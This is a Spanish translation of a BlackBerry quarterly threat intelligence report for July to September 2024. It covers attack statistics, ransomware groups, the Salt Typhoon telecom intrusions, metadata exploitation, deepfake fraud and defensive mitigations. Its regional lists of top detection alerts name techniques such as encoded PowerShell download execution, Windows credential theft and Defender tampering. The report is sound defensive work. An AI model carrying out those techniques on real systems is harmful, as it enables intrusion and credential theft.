Informe global de inteligencia sobre amenazas

Edición de enero de 2025

Periodo de referencia: 1 de julio - 30 de septiembre de 2024

Inteligencia práctica que importa

Este informe proporciona una revisión exhaustiva del panorama mundial de las amenazas, centrándose en proporcionar inteligencia procesable que los líderes puedan utilizar para asegurar proactivamente sus organizaciones. Este informe abarca desde julio hasta septiembre de 2024.

Las soluciones de ciberseguridad de BlackBerry® bloquearon casi un millón de ataques contra clientes estadounidenses, identificando 80.000 firmas maliciosas únicas e impidiendo 430.000 ataques dirigidos contra empresas comerciales.

Para más información, lea Ciberataques en todo el mundo.

Este trimestre, de los 600.000 ataques a infraestructuras críticas detectados este trimestre, el 45% iban dirigidos a instituciones financieras.

Descubra los hallazgos internos y externos de nuestro equipo de Inteligencia sobre Ciberamenazas (CTI) en la sección Infraestructuras críticas.

Los ataques basados en PowerShell demuestran la adaptación regional de los actores de amenazas, al tiempo que mantienen técnicas globales coherentes en NALA, APAC y EMEA.

Lea cómo nuestro análisis del equipo MDR revela la evolución de los patrones de ataque regionales y la persistencia global de las amenazas basadas en PowerShell.

La sección Law Enforcement Limelight revela la evolución del ransomware hacia la guerra psicológica selectiva, que incluye cada vez más datos exfiltrados como arma para dañar la reputación y obtener ventajas estratégicas en lugar de sólo beneficios económicos.

Más información sobre la epidemia de ransomware que afecta a Canadá.

 

RansomHub alberga ahora importantes afiliados, entre ellos LockBit y ALPHV, que representan la mayoría de las operaciones de ransomware detectadas en el tercer trimestre de 2024.

Más información en Actores de amenazas y herramientas.

El nuevo grupo de ransomware Lynx emplea tácticas agresivas de doble extorsión (combinando el robo de datos con la encriptación) y se está expandiendo desde Norteamérica y Australia a los mercados europeos.

Lea nuestra sección Amenazas frecuentes para conocer las tendencias de las amenazas en los principales sistemas operativos.

Proporcionamos una lista de protocolos de seguridad mejorados y contramedidas para hacer frente a la evolución de las tácticas del ransomware, haciendo hincapié en la reducción de la exposición y la seguridad de las comunicaciones.

Consulte la lista en Estrategias de mitigación de riesgos.

Encuentre estrategias detalladas de mitigación en respuesta a Salt Typhoon centradas en la protección de infraestructuras de comunicaciones críticas.

Explorar estrategias de defensa para proteger las infraestructuras críticas de comunicaciones.

Índice

El informe BlackBerry® Global Threat Intelligence Report proporciona información crítica para los CISO y los responsables de la toma de decisiones, centrándose en las amenazas y los retos de ciberseguridad más recientes relevantes para sus sectores y regiones específicos.

En 2024, numerosos factores configuraron el panorama de las amenazas a la ciberseguridad. Las elecciones clave en todo el mundo, los conflictos en curso y las tensiones geopolíticas sobre diversas cuestiones polémicas crearon un entorno volátil. Esta agitación ha empoderado a los actores maliciosos y a los grupos de ciberamenazas en todo el mundo. Estas entidades explotan la incertidumbre y el malestar para obtener beneficios económicos, llevar a cabo ciberespionaje, causar daño o amplificar el caos.

Ciberataques en todo el mundo

Rendimiento de BlackBerry en ciberseguridad impulsada por IA

Durante el periodo de tres meses comprendido entre julio y septiembre de 2024, las soluciones de ciberseguridad de BlackBerry basadas en IA protegieron a una amplia variedad de clientes de todo el mundo. Nuestra tecnología de seguridad frustró casi dos millones de ciberataques y registró más de 3000 hashes maliciosos únicos al día dirigidos a nuestros clientes.

Estados Unidos ha sufrido el mayor volumen de ciberataques este trimestre, mucho más que cualquier otro país. La tecnología de ciberseguridad de BlackBerry bloqueó casi un millón de ataques contra clientes estadounidenses, de los cuales aproximadamente 80.000 implicaban el uso de hashes maliciosos únicos.

BlackBerry realiza un seguimiento del número de hashes maliciosos únicos utilizados en estos ataques, en comparación con el número total de ataques. A menudo, se reutiliza malware comercial o "listo para usar" en ataques a gran escala, lo que hace que se identifique el mismo binario varias veces.

Los programas maliciosos únicos o novedosos suelen emplearse en ataques muy selectivos. Los clientes de BlackBerry de la región de Norteamérica y Latinoamérica (NALA) registraron el mayor número de intentos de ataque (es decir, ataques detenidos por las soluciones de ciberseguridad de BlackBerry) y el mayor número de hashes únicos. APAC (Asia y Pacífico) ocupó el segundo lugar y EMEA (Europa, Oriente Medio y África) el tercero.

Figura 1: Ataques detenidos frente a hash únicos por región julio - septiembre 2024.
Figura 1: Ataques detenidos frente a hash únicos por región julio - septiembre 2024.

Durante este periodo, el análisis del equipo de Detección y Respuesta Gestionadas (MDR) de BlackBerry reveló distintos patrones regionales en la actividad de las amenazas. Los ataques basados en PowerShell emergieron como una amenaza global consistente, con la ejecución codificada en Base64 apareciendo en las cinco principales detecciones en todas las regiones - ocupando el primer lugar en NALA, el quinto en APAC y el tercero en EMEA.

Cada región también mostró características de amenaza únicas:

  • En NALA se observaron grandes volúmenes de abuso de herramientas del sistema, con herramientas de Sysinternals renombradas y shells LOLBAS (Living Off the Land Binaries and Scripts) entre las principales preocupaciones.
  • APAC se enfrentó a importantes intentos de robo de credenciales y evasión de defensas, dirigidos en particular a Windows Defender.
  • EMEA mostró diversos patrones de ataque, desde comandos de descarga PowerShell hasta manipulación de cuentas de usuario.

Esta variación regional en los patrones de ciberataque sugiere que los actores de las amenazas están adaptando sus enfoques en función de factores regionales, al tiempo que mantienen algunas técnicas coherentes a escala mundial.

Figura 2: Las cinco principales alertas de CylanceMDR por región.

NALA

1ª: Ejecución PowerShell codificada en Base64 sospechosa
2º: Se ejecutó una posible herramienta Sysinternals renombrada
3º: Los servicios lanzaron un shell LOLBAS
4º: Ejecución de herramientas de acceso remoto
5º: Ejecución de comando de descarga PowerShell

APAC

1er: Posible robo de credenciales de Windows
2º: La tarea programada Svchost inicia Rundll32
3º: Manipulación de Windows Defender a través de PowerShell
4º: Posible abuso de Msiexec mediante carga de DLL
5º: Ejecución sospechosa de PowerShell codificada en Base64

EMEA

1ª: Ejecución del comando de descarga PowerShell
2º: Posible abuso de la línea de comandos stdout
3º: Ejecución sospechosa de PowerShell codificado en Base64
4º: Creación de cuentas de usuario a través de Net Local Group Add
5º: La tarea programada Svchost inicia Rundll32

Análisis y comentarios geopolíticos

Ha pasado más de una década desde que Leon Panetta, entonces Secretario de Defensa de Estados Unidos, advirtiera de un posible "Pearl Harbor cibernético", destacando la perspectiva de un ciberataque devastador contra las infraestructuras críticas de Estados Unidos que se extendería en cascada por todo el mundo ciberfísico. Aunque su funesta advertencia aún no se ha materializado, nuestra dependencia de las tecnologías digitales vulnerables a los ataques, la explotación y la manipulación ha aumentado. Algunos han caracterizado el predicamento al que se enfrentan nuestras sociedades digitalizadas como un "pacto diabólico" que ha puesto en peligro la seguridad en aras del crecimiento económico, el aumento de la productividad y la comodidad.

Hace diez años, sólo había un puñado de actores, principalmente estatales, capaces de llevar a cabo sofisticados ciberataques. Hoy en día, hay cientos de actores estatales y no estatales. La última Evaluación Nacional de Ciberamenazas del gobierno canadiense, junto con las evaluaciones de ciberamenazas de otros países aliados como el Reino Unido, caracterizan el estado de la ciberinseguridad como cada vez más impredecible, con un elenco creciente de actores de amenazas agresivas que están adoptando nuevas tecnologías y tácticas para mejorar y amplificar sus actividades maliciosas.

El impacto de esta proliferación es generalizado. Según la Global Anti-Scam Alliance, se estima que el 25,5 % de la población mundial se vio afectada por fraudes cibernéticos en 2023. En el Reino Unido, más del 70% de las medianas y grandes empresas y casi el 66% de las organizaciones benéficas de altos ingresos han experimentado algún tipo de violación de la ciberseguridad. En Canadá, más de dos tercios (70%) de los canadienses experimentaron un incidente de ciberseguridad en el último año. El propio análisis de BlackBerry confirma estas tendencias y destaca el aumento de los ciberataques contra infraestructuras críticas.

El ransomware está ampliamente considerado como la forma más perturbadora de ciberdelincuencia y existe un temor creciente a que "el ransomwarepueda paralizar países, no sólo empresas".De hecho, los ataques de ransomware a infraestructuras críticas, como el sector sanitario, han aumentado considerablemente. En Estados Unidos, el Departamento de Salud y Servicios Humanos informó de un aumento del 278% en las grandes violaciones de datos relacionadas con ransomware en hospitales entre 2018 y 2022. Y, a medida que prolifera el número de ataques de ransomware, también lo hace la variedad de tácticas y técnicas utilizadas por los actores del ransomware. Los grupos de ransomware ahora emplean estrategias de extorsión multifacéticas que implican la exfiltración y el cifrado de los datos de las víctimas, al tiempo que mantienen sitios de filtración de datos en la web oscura donde se publican los datos robados de las víctimas que no cumplen. La red de la delincuencia es cada vez más compleja.

El reto no es sólo técnico. La alarmante realidad es que las operaciones de ciberdelincuencia están teniendo un impacto negativo en el bienestar humano. Los investigadores han documentado un aumento de entre el 35% y el 41% de la mortalidad intrahospitalaria tras un ataque de ransomware a un hospital. Otros estudios han puesto de relieve cómo los ataques de ransomware tienen un efecto en cascada en los servicios de urgencias adyacentes, causando importantes trastornos operativos y repercutiendo negativamente en la llegada de ambulancias, los tiempos de espera para recibir tratamiento y la atención a los pacientes.

Otra tendencia alarmante ha sido la aparición de una industria de trata de personas relacionada con la ciberdelincuencia. Las Naciones Unidas han documentado aproximadamente 220.000 personas víctimas de la trata en operaciones de ciberdelincuencia en el Sudeste Asiático en 2023. Estas personas se enfrentan a amenazas contra su vida y son sometidas a torturas y tratos o penas crueles, inhumanos y degradantes, detenciones arbitrarias, violencia sexual, trabajos forzados y otras formas de explotación. Los grupos de delincuencia organizada llevan más de una década dirigiendo operaciones de este tipo desde Camboya, y desde entonces se han extendido a otros países como Myanmar, Tailandia, Laos y Filipinas. En algunos casos, se trafica con personas hacia estos lugares de operaciones de ciberdelincuencia forzada en el Sudeste Asiático desde lugares tan lejanos como Brasil y África Oriental.

A medida que proliferan las ciberamenazas, los gobiernos y la industria están trabajando duro para desbaratar el ecosistema del ransomware y fortalecer nuestra capacidad colectiva para disuadir a los ciberactores maliciosos. En octubre de 2024, BlackBerry y Public Safety Canada acordaron copresidir el Panel Asesor del Sector Público-Privado de la Iniciativa Internacional contra el Ransomware (CRI). Junto con los 68 estados miembros de la CRI, BlackBerry trabaja para fortalecer la resiliencia colectiva contra el ransomware y equipar mejor a los gobiernos de todo el mundo para contrarrestar la amenaza del ransomware y otras amenazas relacionadas con la cibernética.

Figura 3: Distribución de ataques y hashes únicos en infraestructuras críticas y empresas comerciales, abril-junio de 2024 frente a julio-septiembre de 2024.

Ciberataques por sector

Pasando de una perspectiva global a un enfoque sectorial, los analistas de BlackBerry identificaron los principales objetivos de los actores de amenazas. A efectos de este informe, los sectores industriales se consolidan en dos grandes categorías: infraestructuras críticas y empresas comerciales.

BlackBerry recopila telemetría y estadísticas sobre clientes de infraestructuras críticas en los 16 sectores industriales definidos por la Agencia de Ciberseguridad y Seguridad de las Infraestructuras (CISA). Entre ellos se incluyen la sanidad, la administración pública, la energía, las finanzas y la defensa. Las empresas comerciales son aquellas que se dedican a la producción, distribución o venta de bienes y servicios. Estas empresas operan en diversos sectores, como la fabricación, el comercio minorista y los servicios. La figura 3 muestra la distribución de ataques y hashes únicos entre infraestructuras críticas y empresas comerciales.

Figura 3: Distribución de ataques y hashes únicos en infraestructuras críticas y empresas comerciales, abril-junio de 2024 frente a julio-septiembre de 2024.

Amenazas para las infraestructuras críticas

Las infraestructuras críticas pueden ser un objetivo potencialmente lucrativo para los ciberdelincuentes. Los valiosos datos que poseen estas industrias a menudo se venden en mercados clandestinos, se utilizan para planificar futuros ataques o se aprovechan para el espionaje. Recientemente se ha producido un aumento de los ataques centrados en sectores de infraestructuras críticas como la sanidad, la energía, las finanzas y la defensa. Para las organizaciones de estos sectores, el tiempo de inactividad es costoso. Es más probable que paguen un rescate para restaurar rápidamente los sistemas debido a las pérdidas potenciales que tanto ellas como sus clientes podrían sufrir por el tiempo de inactividad y la falta de acceso a datos críticos.

Con más servicios digitalizados y más sistemas conectados a Internet que nunca, las organizaciones de estos sectores se encuentran a menudo en el punto de mira de los ciberdelincuentes. Estos grupos delictivos abarcan desde hackers novatos que buscan el reconocimiento de sus iguales hasta actores organizados de amenazas de estados-nación y grupos de ransomware establecidos que buscan infligir el caos a sus enemigos. El impacto de estos ataques puede ser devastador, afectando a la seguridad nacional e interrumpiendo operaciones esenciales, además de poner en riesgo tanto la estabilidad económica como incluso vidas humanas.

Las soluciones de ciberseguridad de BlackBerry, entre las que se incluyen CylanceENDPOINT™, frustraron casi 600.000 ataques a infraestructuras críticas este trimestre, con el 45% de estos ataques dirigidos al sector financiero. Finanzas sigue siendo un objetivo popular para los ciberatacantes.

Figura 4: Desglose de ataques y hashes únicos por sectores de infraestructuras críticas.
Figura 4: Desglose de ataques y hashes únicos por sectores de infraestructuras críticas.
En la siguiente sección, examinaremos más de cerca algunas de las amenazas más frecuentes a las infraestructuras críticas que hemos encontrado este trimestre. La primera parte enumera los tipos de amenazas que BlackBerry identifica y contra los que se protege con mayor frecuencia en su base de clientes. La segunda parte cubre las amenazas notificadas por terceros, como publicaciones de noticias del sector, proveedores de seguridad o agencias gubernamentales.
Figura 5: Distribución de las amenazas internas de BlackBerry en las infraestructuras críticas este trimestre.

Amenazas para las empresas comerciales

La industria de las empresas comerciales, que abarca sectores como los bienes de equipo, el comercio minorista y el comercio mayorista, es un objetivo primordial para los ciberataques sofisticados. Las violaciones exitosas pueden llevar a redes comprometidas, pérdida de datos, interrupciones operativas, daño a la reputación y costos financieros significativos.

Este trimestre, las soluciones de ciberseguridad de BlackBerry detuvieron más de 430.000 ataques dirigidos contra empresas comerciales. El siguiente gráfico ilustra los sectores que recibieron el mayor volumen de intentos de ataque y hashes de malware únicos.

Figura 6: Distribución de ataques bloqueados y hashes únicos en industrias de empresas comerciales.
Figura 6: Distribución de ataques bloqueados y hashes únicos en industrias de empresas comerciales.
Figura 7: Principales amenazas internas contra las empresas comerciales de julio a septiembre de 2024.
Figura 7: Principales amenazas internas contra las empresas comerciales de julio a septiembre de 2024.

Seguridad de las comunicaciones: Amenazas y soluciones

Debido a su uso casi universal, la infraestructura moderna de telecomunicaciones se enfrenta ahora a una variedad sin precedentes de sofisticadas amenazas dirigidas a sus operaciones fundamentales y flujos de datos. Estas amenazas, que van desde el espionaje a gran escala por parte de Estados-nación hasta las empresas de ciberdelincuencia que ofrecen "interceptación como servicio", explotan las compensaciones inherentes entre la conectividad global y la seguridad de las redes públicas de telecomunicaciones de cada país.

A medida que las organizaciones dependen cada vez más de las comunicaciones móviles y digitales para operaciones sensibles, las brechas de seguridad en estas redes se han convertido en vulnerabilidades críticas que podrían exponer ventajas competitivas, planes estratégicos e información confidencial. La reciente cascada de violaciones de proveedores de telecomunicaciones demuestra que ninguna organización puede dar por sentado que sus comunicaciones son seguras por el mero hecho de utilizar servicios de operador estándar.

A principios de este trimestre, AT&T reveló una importante brecha de seguridad en la que agentes de amenazas comprometieron los registros de llamadas y mensajes de texto de sus clientes de telefonía móvil durante un largo periodo; ahora sabemos que se infiltraron múltiples organizaciones de telecomunicaciones. Algunos dirigentes estadounidenses la calificaron de "la peor brecha de seguridad en telecomunicaciones de la historia de nuestro país". La brecha de AT&T fue muy significativa porque afectó no sólo a los abonados de AT&T, sino también a cualquier persona de todo el mundo que se hubiera comunicado con un cliente de AT&T durante el periodo afectado. Los datos comprometidos incluían metadatos potencialmente valiosos sobre patrones de comunicación, horarios de las llamadas y relaciones entre usuarios.

En esta sección exploraremos los distintos tipos de entidades que amenazan la infraestructura de comunicaciones, las tácticas que utilizan y las medidas paliativas que las organizaciones pueden adoptar para proteger sus datos.

 

Actores de la amenaza

Los actores estatales representan una importante amenaza para la seguridad de las telecomunicaciones internacionales, como demuestran los recientes acontecimientos en los que atacantes vinculados al gobierno chino llevaron a cabo una amplia campaña de ciberespionaje. Estos sofisticados actores se dirigieron a las principales empresas de telecomunicaciones para acceder a los datos de los teléfonos móviles de personalidades destacadas, incluidos candidatos a la presidencia de Estados Unidos.

Las autoridades estadounidenses creen que un agente de amenazas conocido como Salt Typhoon, estrechamente vinculado al Ministerio de Seguridad del Estado chino, es el culpable de la campaña de infiltración en las telecomunicaciones. Sus operaciones afectaron a múltiples operadores importantes, entre ellos Verizon, AT&T y T-Mobile, y los investigadores descubrieron que habían permanecido sin ser detectados en estas redes durante más de un año.

Las entidades delictivas han evolucionado con el tiempo para prestar servicios de ataque altamente especializados dentro del sector de las telecomunicaciones. Entre ellas se incluyen organizaciones que ofrecen "interceptación de llamadas como servicio" y operan plataformas de "escuchas telefónicas como servicio" con servicios fácilmente disponibles para su compra en Internet. Algunos actores de amenazas han desarrollado capacidades para redirigir e interceptar conexiones celulares para cualquier número de teléfono sin que el usuario final sea consciente de ello.

El sector de las telecomunicaciones también se enfrenta a amenazas de adversarios que buscan obtener ventajas mediante la explotación de las comunicaciones. Estos actores se dirigen a personas y organizaciones de alto nivel utilizando los datos interceptados para intentar chantajearlas o sacar a la luz relaciones confidenciales con el fin de socavar la confianza pública en la persona en cuestión. Especialmente preocupante es su capacidad para identificar y potencialmente exponer a partidarios de alto perfil de candidatos políticos que intentan permanecer fuera de la vista pública o individuos cuya seguridad física depende de su anonimato, como periodistas, reporteros y activistas políticos.

Amenazas identificadas

Las vulnerabilidades inherentes a las redes de telecomunicaciones pueden exponer a las organizaciones a una compleja red de amenazas interconectadas. Aunque las redes públicas de telecomunicaciones destacan por su capacidad de alcance mundial, esta accesibilidad conlleva contrapartidas en materia de seguridad que los agentes malintencionados pueden aprovechar (y a menudo lo hacen).

Desde la interceptación directa de las comunicaciones hasta el sofisticado análisis de metadatos, estas amenazas se dirigen no sólo al contenido de las comunicaciones, sino también a los patrones y relaciones que revelan. Las recientes infracciones de los principales proveedores de telecomunicaciones han demostrado que estas amenazas no son meramente teóricas, sino que representan riesgos activos para la confidencialidad entre empresa y empleado, la ventaja competitiva e incluso la seguridad nacional. Algunos de estos riesgos son:

Interceptación de comunicaciones: Los actores de amenazas pueden interceptar tanto las llamadas de audio/vídeo como los mensajes SMS, lo que les permite espiar las comunicaciones en tiempo real. Muchos de los riesgos que estas vulnerabilidades presentan para la telefonía estándar también existen en las aplicaciones gratuitas utilizadas para llamadas de voz y mensajería.

Explotación de metadatos: Con la explotación de metadatos, los actores de amenazas recopilan y analizan tanto los registros detallados de llamadas (CDR) como los registros detallados de mensajes (MDR). Estos datos les permiten construir mapas detallados de las relaciones de contacto y analizar los patrones de comunicación, incluida la frecuencia, la hora del día y la duración de las llamadas. La visibilidad en tiempo real de estos metadatos permite a los actores de las amenazas rastrear a los abonados de las telecomunicaciones individuales e identificar patrones de comunicación explotables.

Ismael Valenzuela, Vicepresidente de Investigación e Inteligencia de Amenazas de BlackBerry, explica: "Los metadatos de telecomunicaciones pueden ser una mina de oro para los ciberdelincuentes. Incluso si no se filtra el contenido de las llamadas y los mensajes de texto, el conocimiento del contexto que hay detrás de estas llamadas, como a quién llama una persona, con qué frecuencia y cuándo, puede convertirse fácilmente en un arma. Los actores de amenazas pueden averiguar aproximadamente dónde vives, dónde trabajas, con quién hablas más a menudo e incluso si llamas a algún número potencialmente sensible, como proveedores de atención sanitaria".

Ataques basados en la identidad: La falta de validación de identidades en las redes públicas hace que la suplantación de identidades y números de teléfono sea endémica y casi imposible de prevenir. Los actores de la amenaza pueden utilizar metadatos robados para dirigirse específicamente a los abonados de telecomunicaciones suplantando los números con los que ya se han estado comunicando. Lo más probable es que quienes descuelguen sean objeto de robo-llamadas, pero en algunos casos los atacantes pueden utilizar nuevas tecnologías, como generadores de voz profunda, para urdir complejas estafas de identidad.

La clonación de la voz de una persona real mediante IA generativa se conoce como deepfake de audio . Este tipo de ataques está ganando terreno rápidamente en el mundo empresarial, ya que los atacantes confían literalmente en que los empleados se fíen de la voz de alguien conocido, como su jefe, y abusan de esta confianza para perpetuar estafas financieras de gran cuantía.

Vulnerabilidades de la infraestructura: La infraestructura moderna de telecomunicaciones presenta retos especialmente difíciles. Las reparaciones suelen requerir la sustitución al por mayor de componentes del sistema, lo que puede provocar interrupciones del servicio y exigir importantes inversiones a los proveedores de telecomunicaciones.

  • Componentes de sistemas heredados: Partes críticas de la red troncal de telecomunicaciones siguen funcionando con sistemas de los años setenta y ochenta que son anteriores a las protecciones modernas de ciberseguridad y fueron diseñados principalmente para operaciones de telefonía fija. Para actualizar estos componentes obsoletos y adaptarlos a las medidas de seguridad actuales, habría que reforzarlos enrutando las comunicaciones a través de redes de retransmisión seguras e implantando un cifrado de extremo a extremo que salvaguarde tanto el contenido de los datos como sus patrones de transmisión.
  • Puntos de acceso a la red: Los protocolos de itinerancia celular de interconexión entre operadores contienen debilidades inherentes que permiten a los actores maliciosos redirigir e interceptar las conexiones celulares. Esta vulnerabilidad existe en todas las principales operadoras, incluidas AT&T, Verizon y T-Mobile, como demuestra el éxito deSalt Typhoon en la explotación de nodos de red de múltiples proveedores.
  • Sistemas de autenticación: Los controles básicos de seguridad, como la autenticación multifactor, están notablemente ausentes en algunos componentes críticos de la infraestructura de telecomunicaciones. Esta carencia permite a los actores de amenazas mantener un acceso persistente una vez que han conseguido la entrada inicial.
  • Sistemas de vigilancia: La infraestructura de "interceptación legal", diseñada para operaciones de vigilancia legal, puede verse comprometida para revelar datos operativos sensibles sobre investigaciones en curso y objetivos de vigilancia.
  • Puntos de tránsito de datos: Las interconexiones entre los proveedores de servicios de Internet y las redes de telecomunicaciones crean puntos de vulnerabilidad adicionales en los que el correo electrónico y otras comunicaciones no cifradas pueden ser interceptadas.
  • Infraestructura de enrutamiento global: El diseño fundamental de las redes de telecomunicaciones da prioridad a la conectividad global sobre la seguridad, creando vulnerabilidades inherentes en la forma en que las llamadas y los datos se enrutan entre los proveedores y a través de las regiones.

Recopilación de información: Las violaciones de las telecomunicaciones ayudan en gran medida a los actores de amenazas en sus capacidades de recopilación de inteligencia. Pueden utilizar la información filtrada para vigilar en tiempo real a determinados abonados y, en algunos casos, identificar relaciones ocultas. En el contexto de las campañas políticas, esta vigilancia les permite descubrir partidarios de alto perfil que intentan mantener la privacidad y exponer conexiones confidenciales. Esta inteligencia puede revelar patrones de comunicación adicionales que también pueden explotarse de formas inesperadas.

"Puede que pienses que no tienes nada que un atacante pueda desear", añade Valenzuela, "pero el mero hecho de saber a quién llamas con más regularidad y en quién sería más probable que confiaras y, por tanto, cogieras una llamada, facilita a los ciberdelincuentes la perpetuación de cualquiera de la multitud de estafas basadas en el teléfono, incluidas las que se basan en audio deepfake para suplantar la voz de una persona conocida."

Amenazas secundarias: La explotación de las vulnerabilidades de las telecomunicaciones puede dar lugar a amenazas secundarias. Entre ellas se incluyen los intentos de chantaje, especialmente cuando se exponen relaciones confidenciales. Además, la información comprometida puede utilizarse para la recopilación de inteligencia competitiva y el espionaje. Si una persona, entidad u organización de alto perfil se ve comprometida, esto puede incluso afectar a los procesos democráticos y amenazar la seguridad nacional.

Según David Wiseman, Vicepresidente de BlackBerry SecuSUITE®"Los secretos que proporcionan ventajas competitivas -ya sea en el mercado o en el campo de batalla- son vulnerables a la exposición. Las redes públicas de telecomunicaciones están diseñadas principalmente para la accesibilidad, lo que a menudo conduce a compromisos de seguridad."

Un problema importante de las redes públicas, incluidas las plataformas de mensajería cifrada, es su naturaleza abierta, que permite que prácticamente cualquiera se una a ellas. Wiseman explica: "En plataformas como Signal o WhatsApp, los usuarios se registran por sí mismos, lo que contribuye a problemas como la suplantación de identidad, el fraude y la preocupación por las falsificaciones. Los sistemas abiertos con autorregistro son inherentemente de alto riesgo".

Mitigación

Para contrarrestar el cambiante panorama de las amenazas a las telecomunicaciones, las organizaciones deben implantar medidas de seguridad integrales que vayan más allá del cifrado básico. Aunque las herramientas de comunicación de consumo ofrecen cierto grado de protección, se quedan cortas a la hora de hacer frente a ataques sofisticados dirigidos tanto al contenido de los mensajes como a los metadatos.

Una defensa eficaz requiere un enfoque multicapa que combine soluciones tecnológicas con protocolos estratégicos y vigilancia humana. Las siguientes estrategias proporcionan un marco para que las organizaciones protejan sus comunicaciones sensibles de los agentes de los Estados-nación, las entidades delictivas y otros agentes de amenazas que tratan de explotar las vulnerabilidades de las telecomunicaciones.

Autenticación y verificación de identidad: La autenticación multifactor (MFA) y los protocolos de verificación de identidad sirven como defensas críticas de primera línea contra el acceso no autorizado y los ataques de ingeniería social.

  • Táctica: Implantar sistemas de autenticación sólidos y formar a los usuarios para que verifiquen las comunicaciones inesperadas a través de canales alternativos o secundarios.
  • Ejemplo: Cuando un ejecutivo recibe un mensaje urgente de un miembro de la junta directiva fuera del horario normal haciendo una petición inusual, sigue el protocolo verificando a través de un canal de comunicación separado preestablecido.

Seguridad de enlaces y mensajes: Los ataques de ingeniería social se aprovechan de la confianza en números de teléfono y fuentes de mensajes conocidos para distribuir contenidos maliciosos.

  • Táctica: Establecer protocolos estrictos para la gestión de enlaces e implantar sistemas que analicen y verifiquen el contenido de los mensajes antes de su entrega.
  • Ejemplo: Una entidad bancaria aplica una política de no hacer clic en enlaces externos, exigiendo que todas las comunicaciones importantes se produzcan dentro de su propia plataforma segura.

Control de la infraestructura: Las organizaciones necesitan una supervisión completa de sus canales de comunicación para evitar accesos no autorizados y mantener las normas de seguridad.

  • Táctica: Implantar sistemas de comunicación en los que la organización mantenga el control total sobre la infraestructura, la autorización de los usuarios y los protocolos de seguridad.
  • Ejemplo: Un contratista de defensa implanta un sistema de comunicación de bucle cerrado en el que todos los usuarios deben estar previamente autorizados y todas las comunicaciones se dirigen a través de canales seguros y supervisados.

Protección de metadatos: Los patrones de comunicación y los metadatos pueden revelar información sensible, incluso cuando el contenido del mensaje es seguro.

  • Táctica: Cifrar y tunelizar todos los metadatos, incluida la información sobre la persona que llama, la duración de la comunicación y los patrones de relación entre usuarios.
  • Ejemplo: Una entidad financiera impide a sus competidores trazar el mapa de sus conversaciones sobre fusiones cifrando no sólo las comunicaciones, sino también los patrones de los ejecutivos que se comunican entre sí.

Mejora de la seguridad móvil: Las comunicaciones móviles plantean retos de seguridad únicos que requieren soluciones criptográficas especializadas.

  • Táctica: Implantar autenticaciones criptográficas certificadas en todas las comunicaciones móviles para evitar la suplantación de llamadas, el fraude y el acceso no autorizado.
  • Ejemplo: Una agencia gubernamental despliega dispositivos móviles con autenticación criptográfica integrada, garantizando que todas las comunicaciones se verifican y son seguras independientemente de su ubicación.

Control del ciclo de vida de los datos: Los sistemas de comunicación tradicionales renuncian al control de los datos una vez compartidos, lo que crea vulnerabilidades de seguridad permanentes.

  • Táctica: Mantener la propiedad organizativa de todos los datos compartidos con la capacidad de revocar el acceso o eliminar contenidos en cualquier momento.
  • Ejemplo: Cuando un ejecutivo abandona una empresa de Fortune 100, la organización revoca inmediatamente el acceso a todos los documentos y comunicaciones compartidos anteriormente.

Defensa contra la ingeniería social: El comportamiento humano básico suele presentar la mayor vulnerabilidad de seguridad en los sistemas de comunicación.

  • Táctica: Implemente programas de formación exhaustivos respaldados por sistemas automatizados para detectar y prevenir los intentos de ingeniería social.
  • Ejemplo: La plataforma de comunicación segura de una organización marca automáticamente y requiere verificación adicional para cualquier patrón o solicitud de comunicación inusual.

Integración de la evaluación de riesgos: Las medidas de seguridad deben adaptarse a los riesgos específicos de la organización y a los requisitos normativos.

  • Táctica: Evaluar periódicamente los riesgos para la seguridad de las comunicaciones y ajustar los protocolos en función de las amenazas emergentes y las necesidades de cumplimiento.
  • Ejemplo: Un proveedor de servicios sanitarios realiza evaluaciones trimestrales de sus medidas de seguridad de las comunicaciones, actualizando los protocolos en función de la nueva información sobre amenazas y los cambios normativos.

Integración holística de la seguridad: La seguridad de las comunicaciones debe integrarse en una estrategia de ciberseguridad más amplia.

  • Táctica: Garantizar que las comunicaciones seguras funcionen conjuntamente con otras medidas y protocolos de seguridad.
  • Ejemplo: Una empresa de fabricación integra su plataforma de comunicación segura con sus sistemas de control de acceso y prevención de pérdida de datos, creando un ecosistema de seguridad unificado.

Arquitectura de datos temporal: El almacenamiento persistente de datos aumenta la vulnerabilidad frente a brechas y accesos no autorizados.

  • Táctica: Implantar sistemas que minimicen la persistencia de los datos mediante el almacenamiento temporal y protocolos de purga automática.
  • Ejemplo: La plataforma de comunicación de un bufete de abogados elimina automáticamente los mensajes de los servidores inmediatamente después de confirmar la entrega a todos los destinatarios autorizados.

Lea nuestro blog para saber más sobre el uso y abuso que hacen los actores de amenazas de los metadatos robados de las comunicaciones móviles.

Los peligros de los deepfakes

El FBI ha publicado recientemente una advertencia sobre los ciberdelincuentes que utilizan IA generativa para cometer fraudes a gran escala, dirigidos a empresas comerciales y organizaciones financieras con elaboradas estafas. El aviso advierte de las ramificaciones de los vídeos y llamadas de voz deepfake, así como de las imágenes de perfil generadas por IA para hacerse pasar por personas que pueden utilizarse en estafas de contratación, como la campaña norcoreana para infiltrarse en empresas informáticas occidentales con espías que se hacen pasar por trabajadores remotos.

Esta superficie de ciberataque recién ampliada es una amenaza muy real para las empresas comerciales de todos los tamaños, con unas pérdidas que se prevé que alcancen la asombrosa cifra de 40.000 millones de dólares en 2027. Como explicó recientemente Shiladitya Sircar, vicepresidente sénior de ingeniería de productos y ciencia de datos de BlackBerry, en un episodio del podcastUnsupervised Learning de Daniel Miessler, "este tipo de adversario generativo de IA crea nuevos vectores de ataque con toda esta información multimodal que nadie ve venir. Crea un panorama de amenazas más complejo y lleno de matices que da prioridad a los ataques basados en la identidad, y no hará más que mejorar."

Las implicaciones para las empresas son profundas. Cuando las partes interesadas ya no pueden confiar en la autenticidad de las comunicaciones de los ejecutivos, todos los aspectos de las operaciones se ven afectados, desde los anuncios que afectan al mercado hasta las directrices estratégicas internas. El sector de los servicios bancarios y financieros se ha convertido en el principal objetivo, enfrentado a retos sin precedentes para mantener la seguridad de las comunicaciones y los procesos de verificación de las transacciones. Como señala Sircar, "el aspecto más preocupante de estas deepfakes es el potencial para erosionar la confianza: la confianza en sistemas que son legítimos, que son verdaderos."

Las organizaciones con visión de futuro ya se están adelantando a los nuevos requisitos normativos, como la Ley estadounidense contra el fraude de IA y la legislación canadiense sobre medios de comunicación no consentidos. Estas novedades normativas marcan un cambio crucial en la forma en que las empresas deben abordar la seguridad de las comunicaciones y la verificación de la identidad.

